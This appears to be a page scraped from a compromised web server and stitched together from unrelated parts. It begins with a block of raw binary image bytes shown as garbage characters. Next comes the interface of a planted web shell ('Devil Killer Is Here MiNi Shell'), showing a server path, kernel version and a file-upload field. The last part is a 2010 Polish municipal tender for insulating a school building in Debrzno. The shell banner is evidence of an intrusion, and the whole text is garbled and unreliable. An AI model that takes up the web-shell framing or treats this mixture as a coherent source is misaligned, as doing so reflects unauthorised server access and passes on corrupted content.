JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100914/250757-N-2010.html

<p class="kh_header"><b>Debrzno: Termoizolacja budynku szkolno - mieszkalnego w Debrznie przy ul. Królewskiej 8 wraz z robotami remontowo - budowlanymi</b><br>
<b>Numer ogłoszenia: 250757 - 2010; data zamieszczenia: 14.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy w Debrznie , ul. Traugutta 2, 77-310 Debrzno, woj. pomorskie, tel. 059 8335366, faks 059 8335351.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.debrzno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Termoizolacja budynku szkolno - mieszkalnego w Debrznie przy ul. Królewskiej 8 wraz z robotami remontowo - budowlanymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie termoizolacji budynku szkolno - mieszkalnego w Debrznie przy ul. Królewskiej 8 wraz z robotami remontowo - budowlanymi.
 W zakresie robót budowlanych można wyróżnić:
	
a.	Docieplenie ścian zewnętrznych.
-  rusztowania zewnętrzne rurowe do wys. 20 m w ilości - 1134,40 m2,
-  rozbiórka rur spustowych  w ilości - 90,75m
-  wymiana rury deszczowej w ilości -  11,0 kpl
-  demontaż elementów stalowych na elewacji  w ilości - 4,0m
-  transport ręczny pociętych elementów konstrukcji stalowej w ilości -   
   350,00 kg
-  rozbiórka  murów ogniowych, okapów, gzymsów itp. z blachy nie nadającej 
   się do użytku w ilości - 13,973 m2
-  odbicie tynków w ilości - 38,041m2
-  uzupełnienie tynków w ilości - 38,041m2
-  demontaż podokienników blaszanych w ilości - 107,00 szt
-  rozbiórka naświetli okiennych z luksferów w ilości - 9,0 m2
-  przygotowanie podłoża pod wykonanie docieplenia ze styropianu w ilości - 
   760,821 m2
-  zamontowanie listew cokołowych (tzw startowych) w ilości - 141,95 m 
-  ocieplenie ręczne ścian budynków , płytami styropianowymi o gr. 10 cm 
   wraz z  wykonaniem wyprawy elewacyjnej akrylowej  w ilości - 760,821m2
-  kołkowanie styropianu w ilości - 3043,284 szt
-  ocieplenie ręczne ścian ościeży budynków , płytami styropianowymi o gr. 
   3 cm  wraz z  wykonaniem wyprawy elewacyjnej akrylowej  w ilości - 
   760,821m2
-  przyklejenie drugiej warstwy siatki - w ilości 170,34 m3
-  zamontowanie listew narożnych w ilości - 456,59m
-  obsadzenie podokienników i parapetów okiennych w ilości - 111,00 szt
-  malowanie elementów stalowych - kraty, balustrady, słupy  w ilości - 
    192,06 m2 i 31,40 m rur 
-  malowanie elewacji farbami fasadowymi w ilości - 328,622 m2
  
b.	Wymiana stolarki otworowej.
-  wymiana okien zespolonych w ilości - 5,10 m2
-  demontaż i montaż drzwi z PCV w ilości - 2,07 m2

c.	Roboty remontowe wejścia do budynku szkoły.
-  naprawa pokrycia dachowego papa termozgrzewalną wierzchniego    
   pokrycia   w ilości - 20,91 m2
-  wymiana pokrycia dachowego z blachy ocynk na pokrycie z blachy 
   powlekanej  w ilości - 15,64 m2
-  rozbiórka elementów schodów betonowych w ilości - 5,595 m3
-  okładziny schodów z płyt betonu płukanego  w ilości - 28,621 m2
-  posadzki z płyt betonu płukanego w ilości - 33,081 m2
-  naprawa tynków zewnętrznych z przygotowaniem podłoża w ilości - 
   43,30 m2
-  wykonanie tynku elewacyjnego silikatowo-żywicznnego w ilości - 43,3 m2

d.	Wymiana instalacji odgromowej.
-  demontaż przewodów uziemiających i odgromowych w ilości - 82,50 m 
-  demontaż wysięgników  w ilości - 11 szt
-  montaż wsporników dla instalacji w ilości - 12,0 szt 
-  montaż uchwytów i  rur winidurowych w ilości - 82,50 m
-  montaż zwodów pionowych naprężnych w ilości - 82,50 m
-  przykręcenie i montaż złącz kontrolnych w ilości - 22,0 szt.

UWAGA :
Pełny i szczegółowy zakres i sposób wykonania przedmiotu zamówienia został wskazany w takich dokumentach jak : specyfikacje techniczne wykonania i odbioru robót (stanowiące załącznik do specyfikacji) oraz przedmiarach robót (stanowiących załącznik do specyfikacji), w oparciu o które należy wykonać roboty budowlane.UWAGA !
1.	Wykonawca w swojej ofercie winien uwzględnić wyłącznie zakres robót określony w załączonym przedmiarze robót oraz w specyfikacji technicznej wykonania i odbioru robót Roboty budowlane będą wykonywane pod kontrolą inspektora nadzoru powołanego przez Zamawiającego. 
Do każdej z nazw firm, znaków firmowych, itp., które zostały wymienione w niniejszej specyfikacji, specyfikacji technicznych wykonania i odbioru robót (stanowiące załącznik do niniejszej specyfikacji) oraz przedmiarach robót (stanowiących załącznik do niniejszej specyfikacji) - dodaje się słowa lub równoważne.

UWAGA !
1.	Materiały i urządzenia przyjęte dla których jest wskazany producent lub dystrybutor są podane przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard.
2.	Zamawiający dopuszcza składnie ofert z użyciem materiałów i urządzeń równoważnych. Warunkiem jest aby materiały i urządzenia równoważne posiadały co najmniej takie same parametry techniczno - użytkowe.
3.	Wykonawca składający ofertę przy zastosowaniu materiałów i urządzeń o równoważnych parametrach jest obowiązany do zapewnienia i udokumentowania ich równoważności (dokumenty określające ich parametry jakościowe oraz wymagany standard np. karty katalogowe, aprobaty techniczne itp.).
4.	Wykonawca ma obowiązek posiadać w stosunku do użytych materiałów i urządzeń dokumenty potwierdzające pozwolenie na ich zastosowanie (atesty, certyfikaty, deklaracje zgodności, świadectwa jakości).
Ponadto wykonawca w ramach przedmiotu zamówienia skalkuluje w cenie ofertowej i bez dodatkowego wynagrodzenia zobowiązuje się do:
a)	realizacji przedmiotu umowy zgodnie przedmiarem robót, STWiOR, SIWZ i  obowiązującymi  w tym względzie normami i przepisami,
b)	zrealizowania w pełni postanowień niniejszej umowy,
c)	wskazania na piśmie przed rozpoczęciem robót osób będących przedstawicielami Wykonawcy podczas wykonania prac budowlanych - kierowników robót, 
d)	przejęcia placu budowy, jego zagospodarowania oraz właściwego oznaczenia i zabezpieczenia terenu budowy i miejsc prowadzenia robót, zapewnienia należytego ładu i porządku, a w szczególności przestrzegania przepisów BHP na terenie budowy na koszt własny,
e)	zapewnienia dostępu (dojścia i dojazdu) do posesji ich mieszkańcom i użytkownikom podczas prowadzenia robót.
f)	urządzenia placu budowy we własnym zakresie i na własny koszt, w tym organizację niezbędnych mediów,
g)	zorganizowania dozoru mienia i wszelkich wymaganych przepisami zabezpieczeń p.poż. na terenie budowy oraz ponoszenia za nie pełnej odpowiedzialności materialnej,
h)	zabezpieczenia terenu budowy przed kradzieżą i innymi ujemnymi oddziaływaniami i ponoszenia skutków finansowych z tego tytułu,
i)	ponoszenia odpowiedzialności za szkody powstałe na terenie budowy pozostające w związku przyczynowym lub spowodowane robotami prowadzonymi przez Wykonawcę,
j)	ubezpieczenia prac budowlanych z tytułu odpowiedzialności za wypadki i szkody wyrządzone przy realizacji prac, w tym ubezpieczenia własnych pracowników, pracowników zamawiającego i osób postronnych,
k)	utrzymywania  terenu  budowy  w stanie wolnym od przeszkód komunikacyjnych oraz usuwania niepotrzebnych urządzeń pomocniczych, zbędnych materiałów oraz odpadów na koszt własny,
l)	wykorzystywania w trakcie realizacji przedmiotu umowy materiałów, osprzętu i urządzeń, które winny odpowiadać co do jakości  wymogom  wyrobów  dopuszczonych do obrotu i stosowania w budownictwie,
m)	wykonania na koszt własny prac niezbędnych ze względu na bezpieczeństwo lub konieczność zapobieżenia awarii,
n)	bezzwłocznego powiadamiania na piśmie Zamawiającego o wszelkich możliwych wydarzeniach  i okolicznościach mogących wpłynąć na opóźnienie robót,
o)	odtworzenia na własny koszt ewentualnych zniszczeń,
p)	usunięcia wszelkich wad i usterek stwierdzonych przez Nadzór Inwestorski w trakcie trwania robót w uzgodnionym przez Strony terminie, nie dłuższym jednak niż termin technicznie uzasadniony, konieczny do ich usunięcia,
q)	zabezpieczenia we własnym zakresie wody i energii elektrycznej niezbędnych do wykonania robót i ponoszenia kosztów ich zużycia.
r)	wykonania niezbędnych badań prób i pomiarów w celu sprawdzenia prawidłowości wykonanych robót.
s)	naprawy uszkodzonych urządzeń uzbrojenia podziemnego i nadziemnego spowodowanych prowadzonymi robotami budowlanymi - w uzgodnieniu z ich użytkownikami (administratorami).
t)	innych prac, których wykonanie będzie niezbędne dla prawidłowej realizacji i funkcjonowania przedmiotu zamówienia.
u)	odbioru, przy współudziale przedstawiciela zamawiającego, robót wykonanych przez podwykonawców,
v)	likwidacji placu budowy i uporządkowania terenu w terminie nie późniejszym niż na dzień zgłoszenia gotowości do odbioru końcowego,
w)	opracowania dokumentacji powykonawczej tj. kosztorysu powykonawczego oraz nanoszenia na bieżąco w dokumentacji  zmian  wprowadzanych w  uzgodnieniu  z  zamawiającym,
x)	przekazania protokołem zdawczo-odbiorczym przez wykonawcę zamawiającemu przedmiotu umowy.
Wykonawca udzieli gwarancji na wykonane roboty na okres wskazany w ofercie, jednak nie krótszy niż 36 miesięcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające o których mowa w art. 67 ust.1 pkt. 6 ustawy Prawo Zamówień Publicznych stanowiących nie więcej niż 50% zamówienia podstawowego. Zamawiający przewiduje udzielenie zamówień uzupełniających w takim zakresie, jeżeli od tego będzie zależało uzyskanie pełnej funkcjonalności przedmiotu zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.26.00.00-7, 45.32.00.00-6, 45.41.00.00-4, 45.11.00.00-1, 45.45.00.00-6, 45.42.10.00-4, 45.33.10.00-6, 45.31.00.00-3, 45.44.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 5.000,00 zł. ( słownie : pięć tysięcy 00/100 złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia musi wykazać, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek posiadania takich uprawnień. Ocena spełnienia powyższego warunku dokonana będzie według formuły spełnia / niespełnia na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzajacego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia musi wykazać, że posiada niezbędną wiedzę i doświadczenie - tzn. wykonawca musi wykazać, że wykonał zgodnie z zasadami sztuki budowlanej i prawidłowo oraz w terminie ukończył, w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej dwie roboty budowlane, polegające na wykonaniu docieplenia i remoncie budynków , o wartości brutto każda nie mniejszej niż 150.000,00 złotych. Powyższe winno być potwierdzone w formie pisemnej przez inwestorów. Ocena spełnienia powyższego warunku dokonana będzie według formuły spełnia / niespełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia musi wykazać, że posiada potencjałem technicznym do wykonania zamówienia.Ocena spełnienia powyższego warunku dokonana będzie według formuły spełnia / niespełnia na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzajacego spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia musi wykazać, że posiada osoby zdolne do wykonania zamówienia - tzn. wykonawca musi wykazać dysponowaniem, w celu wykonania zamówienia, jedną osobą przewidywaną do pełnienia funkcji kierownika robót posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności konstrukcyjno - budowlanej. Posiadającą minimum 5 lat doświadczenia na stanowisku. Powyższe osoby winny należeć do odpowiedniej izby samorządu zawodowego.Ocena spełnienia powyższego warunku dokonana będzie według formuły spełnia / niespełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia musi wykazać, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tzn.posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności  .Ocena spełnienia powyższego warunku dokonana będzie według formuły spełnia / niespełnia w oparciu o informacje zawarte w oświadczeniach i dokumentach załączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz oferty zgodnie ze wzorem stanowiacym załącznik Nr-1 do SIWZ. b) Oświadczenie o spełnianiu warunków zawartych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych (załącznik nr 2 do SIWZ), c)Oświadczenie o spełnieniu warunków udziału w postępowaniu (załącznik nr 3 do SIWZ), d) Stosowne pełnomocnictwo ( oryginał lub kopia notarialnie potwierdzona) w przypadku , gdy upoważnienie do podpisania oferty nie wynika ze złożonego w ofercie odpisu z właściwego rejestru, e) W przypadku wykonawców wspólnie ubiegający się o udzielenie zamówienia dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział wprowadzenie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty złożonej przez Wykonawcę, w następujących okolicznościach: a)Jeżeli Zamawiający dokonał zmiany sposobu wykonania elementu przedmiotu zamówienia, czego nie można było przewidzieć i co nie wynikało z potrzeby wykonania robót i nie można było tego przewidzieć przed zawarciem umowy a co skutkuje zmianą zakresu przedmiotu zamówienia i zmianą terminów jego realizacji, b)Jeżeli wystąpiła konieczność dokonania zamówień dodatkowych nie ujętych w dokumentacji projektowej lub zamiennych, a koniecznych dla właściwego wykonania i funkcjonowania wybudowanego obiektu, c)Jeżeli wystąpiła potrzeba wprowadzenia zmian do dokumentacji projektowej czego nie można było przewidzieć przed zawarciem umowy, a co skutkuje zmianą zakresu przedmiotu zamówienia i zmianą terminów jego realizacji, d)Jeżeli warunki atmosferyczne i geotechniczne nie będą pozwalały na wykonanie przedmiotu umowy ze względów technologicznych, co będzie miało wpływ na jakość wykonanych robót i skutkowało będzie zmianą zakresu i terminu wykonania robot, e)Jeżeli wystąpią nieprzewidziane okoliczności niezależne od zamawiającego skutkujące zmianą sposobu i terminów realizacji przedmiotu zamówienia, f)Na skutek działania siły wyższej zaistnieje konieczność zmiany terminu wykonania zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.debrzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gmiy w  Debrznie 77-310 Debrzno , ul. Traugutta 2, biuro nr 16...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.09.2010 godzina 10:00, miejsce: Urząd Miasta i Gmiy w  Debrznie 77-310 Debrzno , ul. Traugutta 2, pokój nr 1 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





